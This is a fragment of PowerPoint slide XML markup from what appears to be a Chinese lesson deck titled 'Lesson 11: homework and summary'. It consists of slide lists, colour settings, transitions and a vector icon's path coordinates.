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9" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="280" r:id="rId8"/>
    <p:sldId id="263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78" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="294" r:id="rId24"/>
    <p:sldId id="295" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="279" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="306" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="308" r:id="rId38"/>
    <p:sldId id="277" r:id="rId39"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000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C1A4"/>
    <a:srgbClr val="7A9A92"/>
    <a:srgbClr val="164755"/>
    <a:srgbClr val="587B75"/>
    <a:srgbClr val="63827A"/>
    <a:srgbClr val="56F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79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53829-E049-421A-A0A5-429C61A09CD5}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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D6A39-A314-4A31-8804-FB3A91E2B5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472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D6A39-A314-4A31-8804-FB3A91E2B54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945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D6A39-A314-4A31-8804-FB3A91E2B54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7103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D6A39-A314-4A31-8804-FB3A91E2B54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688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D6A39-A314-4A31-8804-FB3A91E2B54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8020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D6A39-A314-4A31-8804-FB3A91E2B54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7790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D6A39-A314-4A31-8804-FB3A91E2B54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0623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D6A39-A314-4A31-8804-FB3A91E2B54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738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D6A39-A314-4A31-8804-FB3A91E2B54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3652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D6A39-A314-4A31-8804-FB3A91E2B54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0979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D6A39-A314-4A31-8804-FB3A91E2B54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0873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D6A39-A314-4A31-8804-FB3A91E2B54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683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D6A39-A314-4A31-8804-FB3A91E2B54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3651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D6A39-A314-4A31-8804-FB3A91E2B54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0736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D6A39-A314-4A31-8804-FB3A91E2B54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1844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D6A39-A314-4A31-8804-FB3A91E2B54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7848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D6A39-A314-4A31-8804-FB3A91E2B54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7577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D6A39-A314-4A31-8804-FB3A91E2B54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0188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D6A39-A314-4A31-8804-FB3A91E2B54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2400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D6A39-A314-4A31-8804-FB3A91E2B54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0919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D6A39-A314-4A31-8804-FB3A91E2B54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0501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D6A39-A314-4A31-8804-FB3A91E2B54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8619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D6A39-A314-4A31-8804-FB3A91E2B54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3294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D6A39-A314-4A31-8804-FB3A91E2B54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8983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D6A39-A314-4A31-8804-FB3A91E2B54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0349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D6A39-A314-4A31-8804-FB3A91E2B54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3555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D6A39-A314-4A31-8804-FB3A91E2B54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8632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D6A39-A314-4A31-8804-FB3A91E2B54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0613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D6A39-A314-4A31-8804-FB3A91E2B54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4572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D6A39-A314-4A31-8804-FB3A91E2B54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97332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D6A39-A314-4A31-8804-FB3A91E2B54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5351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D6A39-A314-4A31-8804-FB3A91E2B543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9257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D6A39-A314-4A31-8804-FB3A91E2B543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737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D6A39-A314-4A31-8804-FB3A91E2B54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444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D6A39-A314-4A31-8804-FB3A91E2B54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95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D6A39-A314-4A31-8804-FB3A91E2B54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2376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D6A39-A314-4A31-8804-FB3A91E2B54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9997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D6A39-A314-4A31-8804-FB3A91E2B54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1124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D6A39-A314-4A31-8804-FB3A91E2B54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265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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38B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2" r="21235"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-142755"/>
            <a:ext cx="12192000" cy="700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83138"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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215684"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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503739"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38B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8" t="1" r="19577" b="-4947"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="719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2772"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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084585"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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547710"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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4561414"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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7604138"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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471247"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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602228"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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7722AE-13C7-42F0-B868-3D7F30385273}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/13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E08E6C-8D4D-4DEB-8C0B-97CA14AE38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8215230"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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6822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1000">
    <p:wheel spokes="1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783864" y="1663701"/>
            <a:ext cx="38290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 smtClean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2017</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8000" b="1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50228" y="2888345"/>
            <a:ext cx="8606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8000" b="1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>第 十 一 课 作 业 及 小 结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mn-lt"/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9674224" y="4088033"/>
            <a:ext cx="1943837" cy="621565"/>
            <a:chOff x="9674224" y="4088033"/>
            <a:chExt cx="1943837" cy="621565"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9710061" y="4673598"/>
              <a:ext cx="1908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9" name="组合 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="10407420" y="4088037"/>
              <a:ext cx="468000" cy="468000"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="650875" cy="620712"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Oval 1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650875" cy="6207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buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="007DA7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Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="144463" y="112712"/>
                <a:ext cx="446087" cy="393700"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 545"/>
                  <a:gd name="T1" fmla="*/ 181727242 h 505"/>
                  <a:gd name="T2" fmla="*/ 140690929 w 545"/>
                  <a:gd name="T3" fmla="*/ 306930079 h 505"/>
                  <a:gd name="T4" fmla="*/ 245874151 w 545"/>
                  <a:gd name="T5" fmla="*/ 290520195 h 505"/>
                  <a:gd name="T6" fmla="*/ 222425526 w 545"/>
                  <a:gd name="T7" fmla="*/ 135535708 h 505"/>
                  <a:gd name="T8" fmla="*/ 216395576 w 545"/>
                  <a:gd name="T9" fmla="*/ 285049714 h 505"/>
                  <a:gd name="T10" fmla="*/ 143370725 w 545"/>
                  <a:gd name="T11" fmla="*/ 257091557 h 505"/>
                  <a:gd name="T12" fmla="*/ 123272255 w 545"/>
                  <a:gd name="T13" fmla="*/ 179295658 h 505"/>
                  <a:gd name="T14" fmla="*/ 24788523 w 545"/>
                  <a:gd name="T15" fmla="*/ 176256761 h 505"/>
                  <a:gd name="T16" fmla="*/ 28137858 w 545"/>
                  <a:gd name="T17" fmla="*/ 56523626 h 505"/>
                  <a:gd name="T18" fmla="*/ 143370725 w 545"/>
                  <a:gd name="T19" fmla="*/ 32212456 h 505"/>
                  <a:gd name="T20" fmla="*/ 0 w 545"/>
                  <a:gd name="T21" fmla="*/ 54092821 h 505"/>
                  <a:gd name="T22" fmla="*/ 205676392 w 545"/>
                  <a:gd name="T23" fmla="*/ 63209510 h 505"/>
                  <a:gd name="T24" fmla="*/ 192946951 w 545"/>
                  <a:gd name="T25" fmla="*/ 50445833 h 505"/>
                  <a:gd name="T26" fmla="*/ 202996596 w 545"/>
                  <a:gd name="T27" fmla="*/ 43152638 h 505"/>
                  <a:gd name="T28" fmla="*/ 227785118 w 545"/>
                  <a:gd name="T29" fmla="*/ 43152638 h 505"/>
                  <a:gd name="T30" fmla="*/ 237833944 w 545"/>
                  <a:gd name="T31" fmla="*/ 50445833 h 505"/>
                  <a:gd name="T32" fmla="*/ 225774862 w 545"/>
                  <a:gd name="T33" fmla="*/ 63209510 h 505"/>
                  <a:gd name="T34" fmla="*/ 237833944 w 545"/>
                  <a:gd name="T35" fmla="*/ 76580497 h 505"/>
                  <a:gd name="T36" fmla="*/ 227785118 w 545"/>
                  <a:gd name="T37" fmla="*/ 83873692 h 505"/>
                  <a:gd name="T38" fmla="*/ 202996596 w 545"/>
                  <a:gd name="T39" fmla="*/ 83873692 h 505"/>
                  <a:gd name="T40" fmla="*/ 192946951 w 545"/>
                  <a:gd name="T41" fmla="*/ 76580497 h 505"/>
                  <a:gd name="T42" fmla="*/ 298130173 w 545"/>
                  <a:gd name="T43" fmla="*/ 115478837 h 505"/>
                  <a:gd name="T44" fmla="*/ 360435840 w 545"/>
                  <a:gd name="T45" fmla="*/ 188412346 h 505"/>
                  <a:gd name="T46" fmla="*/ 334977778 w 545"/>
                  <a:gd name="T47" fmla="*/ 195098230 h 505"/>
                  <a:gd name="T48" fmla="*/ 298130173 w 545"/>
                  <a:gd name="T49" fmla="*/ 115478837 h 505"/>
                  <a:gd name="T50" fmla="*/ 260613029 w 545"/>
                  <a:gd name="T51" fmla="*/ 22487676 h 505"/>
                  <a:gd name="T52" fmla="*/ 288081348 w 545"/>
                  <a:gd name="T53" fmla="*/ 114870746 h 505"/>
                  <a:gd name="T54" fmla="*/ 275351907 w 545"/>
                  <a:gd name="T55" fmla="*/ 128849824 h 505"/>
                  <a:gd name="T56" fmla="*/ 251903283 w 545"/>
                  <a:gd name="T57" fmla="*/ 110616447 h 505"/>
                  <a:gd name="T58" fmla="*/ 170168685 w 545"/>
                  <a:gd name="T59" fmla="*/ 22487676 h 505"/>
                  <a:gd name="T60" fmla="*/ 245874151 w 545"/>
                  <a:gd name="T61" fmla="*/ 35859443 h 505"/>
                  <a:gd name="T62" fmla="*/ 185577922 w 545"/>
                  <a:gd name="T63" fmla="*/ 90559576 h 505"/>
                  <a:gd name="T64" fmla="*/ 116571946 w 545"/>
                  <a:gd name="T65" fmla="*/ 267424428 h 505"/>
                  <a:gd name="T66" fmla="*/ 44886993 w 545"/>
                  <a:gd name="T67" fmla="*/ 200567931 h 505"/>
                  <a:gd name="T68" fmla="*/ 116571946 w 545"/>
                  <a:gd name="T69" fmla="*/ 267424428 h 505"/>
                  <a:gd name="T70" fmla="*/ 42207197 w 545"/>
                  <a:gd name="T71" fmla="*/ 86912588 h 505"/>
                  <a:gd name="T72" fmla="*/ 143370725 w 545"/>
                  <a:gd name="T73" fmla="*/ 92383069 h 505"/>
                  <a:gd name="T74" fmla="*/ 91113884 w 545"/>
                  <a:gd name="T75" fmla="*/ 74149692 h 505"/>
                  <a:gd name="T76" fmla="*/ 42207197 w 545"/>
                  <a:gd name="T77" fmla="*/ 141005409 h 505"/>
                  <a:gd name="T78" fmla="*/ 46226891 w 545"/>
                  <a:gd name="T79" fmla="*/ 156199890 h 505"/>
                  <a:gd name="T80" fmla="*/ 144710623 w 545"/>
                  <a:gd name="T81" fmla="*/ 139181915 h 505"/>
                  <a:gd name="T82" fmla="*/ 42207197 w 545"/>
                  <a:gd name="T83" fmla="*/ 141005409 h 505"/>
                  <a:gd name="T84" fmla="*/ 42207197 w 545"/>
                  <a:gd name="T85" fmla="*/ 119125044 h 505"/>
                  <a:gd name="T86" fmla="*/ 144710623 w 545"/>
                  <a:gd name="T87" fmla="*/ 123987434 h 505"/>
                  <a:gd name="T88" fmla="*/ 150070215 w 545"/>
                  <a:gd name="T89" fmla="*/ 115478837 h 505"/>
                  <a:gd name="T90" fmla="*/ 89773986 w 545"/>
                  <a:gd name="T91" fmla="*/ 107577550 h 505"/>
                  <a:gd name="T92" fmla="*/ 42207197 w 545"/>
                  <a:gd name="T93" fmla="*/ 113655343 h 505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545" h="505">
                    <a:moveTo>
                      <a:pt x="0" y="89"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="159"/>
                      <a:pt x="0" y="229"/>
                      <a:pt x="0" y="299"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="304"/>
                      <a:pt x="92" y="392"/>
                      <a:pt x="103" y="404"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="416"/>
                      <a:pt x="202" y="505"/>
                      <a:pt x="210" y="505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="505"/>
                      <a:pt x="294" y="505"/>
                      <a:pt x="336" y="505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="354" y="505"/>
                      <a:pt x="360" y="489"/>
                      <a:pt x="367" y="478"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="367" y="391"/>
                      <a:pt x="367" y="304"/>
                      <a:pt x="367" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="359" y="220"/>
                      <a:pt x="336" y="210"/>
                      <a:pt x="332" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="229"/>
                      <a:pt x="332" y="327"/>
                      <a:pt x="332" y="347"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="332" y="367"/>
                      <a:pt x="337" y="469"/>
                      <a:pt x="323" y="469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="289" y="469"/>
                      <a:pt x="255" y="469"/>
                      <a:pt x="220" y="469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="469"/>
                      <a:pt x="214" y="434"/>
                      <a:pt x="214" y="423"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="405"/>
                      <a:pt x="214" y="388"/>
                      <a:pt x="214" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="322"/>
                      <a:pt x="214" y="315"/>
                      <a:pt x="184" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="295"/>
                      <a:pt x="171" y="290"/>
                      <a:pt x="159" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="290"/>
                      <a:pt x="78" y="290"/>
                      <a:pt x="37" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="227"/>
                      <a:pt x="37" y="164"/>
                      <a:pt x="37" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="96"/>
                      <a:pt x="39" y="97"/>
                      <a:pt x="42" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="93"/>
                      <a:pt x="134" y="93"/>
                      <a:pt x="180" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="87"/>
                      <a:pt x="214" y="66"/>
                      <a:pt x="214" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="53"/>
                      <a:pt x="98" y="53"/>
                      <a:pt x="39" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="53"/>
                      <a:pt x="0" y="75"/>
                      <a:pt x="0" y="89"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="288" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="307" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="86"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="287" y="85"/>
                      <a:pt x="287" y="84"/>
                      <a:pt x="288" y="83"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="300" y="71"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="70"/>
                      <a:pt x="302" y="70"/>
                      <a:pt x="303" y="71"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="322" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="71"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="341" y="70"/>
                      <a:pt x="342" y="70"/>
                      <a:pt x="343" y="71"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="355" y="83"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="84"/>
                      <a:pt x="356" y="85"/>
                      <a:pt x="355" y="86"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="337" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="123"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="124"/>
                      <a:pt x="356" y="125"/>
                      <a:pt x="355" y="126"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="343" y="138"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="139"/>
                      <a:pt x="341" y="139"/>
                      <a:pt x="340" y="138"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="322" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="138"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="139"/>
                      <a:pt x="301" y="139"/>
                      <a:pt x="300" y="138"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="288" y="126"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="287" y="125"/>
                      <a:pt x="287" y="124"/>
                      <a:pt x="288" y="123"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="445" y="190"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="538" y="283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="545" y="290"/>
                      <a:pt x="545" y="303"/>
                      <a:pt x="538" y="310"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="527" y="321"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="328"/>
                      <a:pt x="508" y="328"/>
                      <a:pt x="500" y="321"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="407" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="190"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="254" y="37"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="292" y="0"/>
                      <a:pt x="352" y="0"/>
                      <a:pt x="389" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="422" y="70"/>
                      <a:pt x="425" y="122"/>
                      <a:pt x="399" y="159"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="430" y="189"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="431" y="190"/>
                      <a:pt x="431" y="193"/>
                      <a:pt x="430" y="194"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="411" y="212"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="214"/>
                      <a:pt x="408" y="214"/>
                      <a:pt x="406" y="212"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="376" y="182"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="339" y="208"/>
                      <a:pt x="288" y="205"/>
                      <a:pt x="254" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217" y="134"/>
                      <a:pt x="217" y="74"/>
                      <a:pt x="254" y="37"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="277" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="35"/>
                      <a:pt x="342" y="35"/>
                      <a:pt x="367" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="391" y="84"/>
                      <a:pt x="391" y="124"/>
                      <a:pt x="367" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="174"/>
                      <a:pt x="302" y="174"/>
                      <a:pt x="277" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="124"/>
                      <a:pt x="252" y="84"/>
                      <a:pt x="277" y="59"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="440"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="403"/>
                      <a:pt x="173" y="367"/>
                      <a:pt x="172" y="330"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="330"/>
                      <a:pt x="102" y="330"/>
                      <a:pt x="67" y="330"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="331"/>
                      <a:pt x="66" y="332"/>
                      <a:pt x="65" y="332"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="368"/>
                      <a:pt x="138" y="404"/>
                      <a:pt x="174" y="440"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="133"/>
                      <a:pt x="63" y="138"/>
                      <a:pt x="63" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="148"/>
                      <a:pt x="66" y="152"/>
                      <a:pt x="71" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="152"/>
                      <a:pt x="166" y="152"/>
                      <a:pt x="214" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="152"/>
                      <a:pt x="224" y="130"/>
                      <a:pt x="220" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="122"/>
                      <a:pt x="164" y="122"/>
                      <a:pt x="136" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="122"/>
                      <a:pt x="63" y="118"/>
                      <a:pt x="63" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="232"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="238"/>
                      <a:pt x="63" y="244"/>
                      <a:pt x="63" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="255"/>
                      <a:pt x="64" y="257"/>
                      <a:pt x="69" y="257"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="257"/>
                      <a:pt x="171" y="257"/>
                      <a:pt x="222" y="257"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="252"/>
                      <a:pt x="228" y="229"/>
                      <a:pt x="216" y="229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="229"/>
                      <a:pt x="121" y="229"/>
                      <a:pt x="73" y="229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="229"/>
                      <a:pt x="65" y="231"/>
                      <a:pt x="63" y="232"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="187"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="190"/>
                      <a:pt x="63" y="193"/>
                      <a:pt x="63" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="201"/>
                      <a:pt x="64" y="200"/>
                      <a:pt x="67" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="204"/>
                      <a:pt x="166" y="204"/>
                      <a:pt x="216" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="219" y="203"/>
                      <a:pt x="222" y="201"/>
                      <a:pt x="224" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="197"/>
                      <a:pt x="224" y="193"/>
                      <a:pt x="224" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="183"/>
                      <a:pt x="222" y="181"/>
                      <a:pt x="220" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="177"/>
                      <a:pt x="163" y="177"/>
                      <a:pt x="134" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="177"/>
